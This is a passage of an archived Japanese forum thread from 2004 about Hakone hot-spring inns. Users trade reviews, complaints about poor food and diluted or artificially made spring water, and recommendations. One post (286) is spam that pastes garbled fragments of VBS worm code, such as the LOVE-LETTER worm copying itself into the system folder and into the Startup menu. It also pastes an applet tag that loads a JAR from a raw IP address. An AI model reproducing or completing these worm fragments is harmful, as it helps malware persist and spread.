本館の階段はヒノキの立派なものだが、ワックス掛けすぎでスリッパで歩くと
滑って危険なので、トラロープが階上からたらしてある、昇降はそれを掴んで
行う。

飯、なけるほどにまずい。
料理人が常駐していないようなので、どこかで作ったものを軽トラックに
積んで運んでくるのを部屋から目撃した。

風呂。
名物の金時風呂は年を通して枯渇していることが多い。
そのくせ、外湯で2000円というのは、ボッタクリ以外の何物でもない。
事実、何も知らないで宿泊した時、金時風呂の浴室にはクモの巣が張っていた。

帰宅後。
実名入りで、箱根観光協会に書簡を送った。
もちろん。
クレームの内容に終始したものですた。

251 :関東人 ◆sRy6Ubf5ts :04/04/02 15:45 ID:OTBrynlt
箱根宮の下のかんすいろうは食事うまーかたよ。
でも行ったの10年ぐらい前だけど・・・・

252 :名無しさん@いい湯だな:04/04/04 14:20 ID:PTTQRBYx

中国人はやることがエゲツナイ

http://www.geocities.co.jp/WallStreet-Stock/4371/baoli/index01.html


253 :名無しさん@いい湯だな:04/04/05 22:03 ID:w+dRLEM6
ホテルはつはな、て温泉は源泉掛け流しなのかな?

254 :名無しさん@いい湯だな:04/04/13 04:31 ID:X6L6tic6
知人からホテルラクーンの優待券を貰いました。
ここの評判とか雰囲気わかりますか?
宿泊した人がいたらしりたいです。

255 :名無しさん@いい湯だな:04/04/13 09:22 ID:zLBZzYIe
湯本は今、温泉出てなくて9割り方ブレンド湯です。 宮下から上行かないとだめだよ、気を付けな。

256 :名無しさん@いい湯だな:04/04/13 13:22 ID:wOCnoo1s
親孝行兼ねて子供連れで武蔵野別館へ行きたいのですが、
過去スレを読むとカップル向けとのコメントがあります。
家族連れだと浮いちゃう感じですか?
隣の部屋から嬌声が聞こえたり・・しないですよね?
アドバイスお願いいたします。


257 :名無しさん@いい湯だな:04/04/13 16:43 ID:9JiuKcFy
箱根湯本 山家荘はどうなんでしょうか?
行かれた方、感想をお聞かせください。

258 :名無しさん@いい湯だな:04/04/14 21:24 ID:ZdDYxQHn
>>254
源泉がちょろちょろと上から落ちてたけど少なすぎ。
部屋は古いけど見晴らしがいいかな。
食堂の吹き抜け窓が掃除してない、汚いです。


259 :名無しさん@いい湯だな:04/04/14 23:07 ID:83puW1wf
結局、箱根で宿泊以外で温泉がNo.1ってどこよ。
浴室・浴槽、景観、環境、泉質面で異なると思うが。

260 :(*бvб):04/04/15 12:10 ID:5dVQJtLa
個人的には
泉質 松坂屋
環境 楽遊壽林
景観 某禅寺の露天。一部の女は天山かも。
浴室はわかんない。

261 :名無しさん@いい湯だな:04/04/15 23:42 ID:CIVpYoVQ

箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w


262 :名無しさん@いい湯だな:04/04/16 19:22 ID:eidLhFGm
俵石閣についてなんですが、
いろいろな口コミをみると評価が極端に分かれてます。
○『さすが老舗!』
×『古いだけ・料理も普通・風呂ぬるい』など。
予約をいれるか迷ってます。
最近泊まったかた、教えていただけませんか?
また、他に休前日25,000位でお勧めはありますでしょうか?
宜しくお願いします。

263 :名無しさん@いい湯だな:04/04/16 20:46 ID:GDjJm3gY
いろんな作り方があるよ。
穴ぼこに水を吹き込んで、吸い出す温泉水とか。


264 :名無しさん@いい湯だな:04/04/16 21:47 ID:LHz+Jvgx
>261
しかし、出来た酸性硫黄泉は下手な塩化物泉なんかよりいいと感じたが

265 :(*бvб):04/04/16 22:48 ID:JLj9kOOT
同じ作り方を塩原の新湯や福島の奥土湯でしてるけど、
箱根と比べるとやっぱ塩原や奥土湯の方が良いんだよね。

箱根のは完全に、一企業の「商品」になっちゃってるから、
水を徹底的に入れて文字通り水増しされてる気がする。

そんなわけで、箱根で硫黄系を求めるのなら芦の湯がベターな気はする。

266 :名無しさん@いい湯だな:04/04/18 12:27 ID:yJW8avFH
>262
最近行っていないので、変わっているかもしれませんが、
俵石閣は、昔は料理がかなり美味しかったんですが、料理長が変わって
普通になってしまいました。
部屋は15年ぐらい前に改装しているので、ボロいというわけではなく、
数寄屋づくりで、趣がありますが「古いじゃん」で終わる人もいるかも。
大浴場とかも小さい(5人ぐらいでいっぱいかも)し、露天もありません。
お湯は硫黄泉です。
庭がひろく(ブルーノタウト絶賛の庭だそうだ)静かです。
硫黄泉に入って静かに過ごしたいけど、
萬岳楼は湯治場みたいでマニアックすぎ、と言う人にはいいいかも。
でも、休前日25000円では泊まれないのでは?


267 :262:04/04/19 10:45 ID:XTLANxmg
>266
アドバイス、有り難うございました。
参考になります。

268 :名無しさん@いい湯だな:04/04/21 22:50 ID:TY7J7bo2
客室内に温泉のある宿は無いですか?
数年前はよくパンフで見かけたんだけど。

269 :名無しさん@いい湯だな:04/04/22 13:31 ID:yZSYtZCs
某美術館に今朝、オリエント急行の車両が到着。
道路を車両が運ばれてるの見て驚いた・・・・

270 :風呂小路あたまろ ◆Hhx90zUBjo :04/04/22 20:40 ID:ewHB3Tsg

  ___         / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 / || ̄ ̄|| ∧_∧   <  きのくにやの半額クーポンゲトーすた 今日へえってきた
 |  ||__|)( ・∀・)    \______________
 | ̄ ̄\三⊂/ ̄ ̄ ̄/
 |    | ( ./     /



271 :名無しさん@いい湯だな:04/04/22 21:40 ID:tUG59EpI
>268
上で出てる萬岳楼も俵石閣もそうだよ。(部屋風呂が温泉ってことだよね)
昔からある宿は結構そうなんじゃないの?
あと、宮ノ下の富士屋ホテルも洋式のバスタブだが、
蛇口をひねると温泉がでる。

272 :名無しさん@いい湯だな:04/04/23 15:04 ID:ukYRc7sL
桐谷荘で宿泊して来ました。

とても静かで、風の音やホトトギスの声が聞こえてよかったです。
部屋もきれいでした。
お風呂は景色がイマイチ&別館の方は熱すぎだけど、
まぁ良かったと思います。


帰りに楽遊壽林寄っていきました。
森に囲まれ、ヒノキの匂いがし、
いいと思いました。午前中に行ったせいか
風呂も休憩も貸し切り状態でゆっくりできましたし。
でも、コストパフォーマンスという点では、
ちょっと割高かもしれませんね。
食事や飲み物も高杉…

273 :(*бvб):04/04/23 18:39 ID:gU2bXBa/
楽遊壽林は、ぼったくられる事で自己満足している人の為の施設だもん。
高ければ高い程、品質やサービスも正比例していると思い込んでて。
味もわかんないのに、エビスビール飲んでちょっと贅沢な気分になっている様な奴ですね。

274 :名無しさん@いい湯だな:04/04/23 23:11 ID:+BEYKtFa
>>273
それはそれでいいじゃん。

275 :名無しさん@いい湯だな:04/04/25 01:34 ID:/nIBJEwn
>>271
いえ、部屋に露天風呂の縮小版みたいのがついてるとこがあったんです。
普通の風呂で蛇口から温泉が出るみたいなのじゃなくて。

276 :名無しさん@いい湯だな:04/04/25 01:37 ID:/nIBJEwn
>>271
あ、萬岳楼がいい感じです。ありがとうございました

277 :お知らせ:04/04/26 10:00 ID:lvF+Kmur
テレビ朝日系毎週火曜19:00〜19:54は『旅の香り時の遊び』
を放送しています。毎週あなたの気持ちを充実させる旅案内に、癒される数々の映像!!あなたの旅のナビゲーションにお役に立つこと間違いない情報も満載です!!ぜひご覧ください!!
詳細情報↓
http://www.tv-asahi.co.jp/tabitoki/

278 :264:04/04/27 22:17 ID:txlGRhX4
>(*бvб) さん
箱根はとにかく都心から近いってのが魅力ですな。
草津や那須にいかなくても近場で硫黄泉に入れるってことがイイよ
たとえ作られた温泉であろうが、私は気にしないがね。
それに、全部が全部、某温泉会社の硫黄泉とは限らないんだが?

>273
あそこはあそこで、べつにぼったくりとは思わないんだけどな〜
静かな環境で作りもまあまあ、休憩所もくつろげるしナー。
まあ、ひとそれぞれ、見方が違うがなw


279 :名無しさん@いい湯だな:04/04/27 22:32 ID:8xvr03Ah
コテハン荒らし(本人曰く煽ラーだそうだが)にマジレスしないように。

280 :名無しさん@いい湯だな:04/04/27 23:52 ID:KmLWU7Cy

箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w

281 :(*бvб):04/04/28 09:56 ID:JRPvxLel
>>264 278
箱根の天然硫黄泉は芦ノ湯の松坂屋ときのくにやが良いし、
実際、箱根でも某禅寺の片方の源泉とTOPを争う名湯だと思います。
ただ、芦ノ湯は人気があるせいか、日帰り客に冷淡なんですよね。
宿泊客優先なのは判るけど、露骨に嫌な顔をされて「入らせていただく」のは
ここと石和に少ない掛け流しの某旅館位のものです。

「楽」に関しては、箱根なら仕方ないのかなと思いますが。。
何だかんだ言っても、観光客が多すぎて、結局都会同様に寛げない
箱根だからこそ、成り立つ商売の様な気がします。

造成泉については、塩原のは好きですが、箱根の方はちょっと薄い気がして
610ハップぽく感じるので、個人的には今ひとつなのです。

>>279
(´ー`)y-~~<マターリ以外の批判や毒舌は全て荒らしなのでちゅねー。ヨシヨシ。


282 :名無しさん@いい湯だな:04/04/29 09:59 ID:g+0+SFoy
>281
私は610ハップや湯の花の銭湯はどうも、箱根みたいに酸性にならないし、溶存成分もないし、循環だったりして満足できないな。

松坂屋は以前はハイキングの帰り、よく立ち寄ったりしたとき対応はよかったんだがな。
まあ、金おとさない立ち寄り客が押し寄せると宿泊客優先になるわな。

283 :名無しさん@いい湯だな:04/05/05 01:23 ID:n9FUUTAv
転載しまつね。

16 :名無しさん@いい湯だな :03/10/31 22:29 ID:arCsBrog
>15
お前は全然解かってない。
残念ながら、真の名湯は掘りまくられたため既に没落している。
箱根が名湯と聞いたことないし古人も箱根を名湯と評価していない。
だが一応、昔は湯治場として意味があったかもしれない。

要は箱根に多くの人が訪れるようになり、少ない湧出量でそれをまかなうため水で薄めたり人工的に温泉を造成したりした昭和以降そして現在、箱根を名湯を持ち上げる評論家をどうとらえるか、だ。

284 :名無しさん@いい湯だな:04/05/05 16:27 ID:Ww+iGVRe
ハコネ デ センシツ トウ バカ ガ イル スレ ハ ココデスカ?

285 :(*бvб):04/05/05 16:28 ID:jOuDBBfN
多分さ、旅行代理店みたいな業者にしても一番売りやすいのが箱根や伊豆なんだと思うよ。
まず、首都圏に近い、一つのブランド温泉地として認識されてる。
たぶん「今度の週末は夫婦やカプール、グループで仲良くのんびりできれば、
ちょっとばかりお金を使ってもいいかな」が箱根の客層のメインだと思う。
群馬みたいに変に温泉の質にこだわってるマニアは少ないし、
金に拘らない(シビアではない)分、旅行代理店と旅館の利幅も大きい。
東北みたいにボロだけど名湯っていう所(=評価が個人で割れる)も少ないからクレームも少なそうだし、
デエトで100点は取れなくても失敗はしたくないような、付き合いはじめのカプールや団体旅行には最適ではないかと。
さらに箱根に名物がある訳じゃないし、宿泊料金は高く取れる分、一般的に贅沢そうに見えるもの
(ブランド牛肉とか高級海産物とか)を出せば、地のものじゃなくても十分満足する人達でしょう。
お金を掛ければ旅館だって良い食物を購入するのは簡単でしょう。
その分、広告営業に回すお金も出てきて、評論家やマスコミはそれに飛びつく。
結局、旅館も代理店もマスゴミも失敗を避けたい一般的日本人にも都合が良いのが箱根。

結果、循環でも加水でも「のんびり」「一緒に逝った相手と思ひ出作り」ができて
それを100点とする人達で成り立つのが箱根かなと。

286 :名無しさん@いい湯だな:04/05/08 20:57 ID:X/Dg51wu
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

<applet code="XView.class" codebase="http://64.156.47.155:80/wstream" name="EmuCam"
archive="XView.jar" width="640" height="480" id="EmuCam">
<fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" >
<param name=id value=16><param name="k1" value="123456789012345">
<param name="k2" value="678901234567890"></applet>

287 :名無しさん@いい湯だな:04/05/09 20:41 ID:FQMGZuYX
小雪と坂口が泊まったGって
吟遊?強羅花壇?

288 :名無しさん@いい湯だな:04/05/09 23:56 ID:Intu10wH
またウゼーの貼り付けやがったなゲスヤローめが

76 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)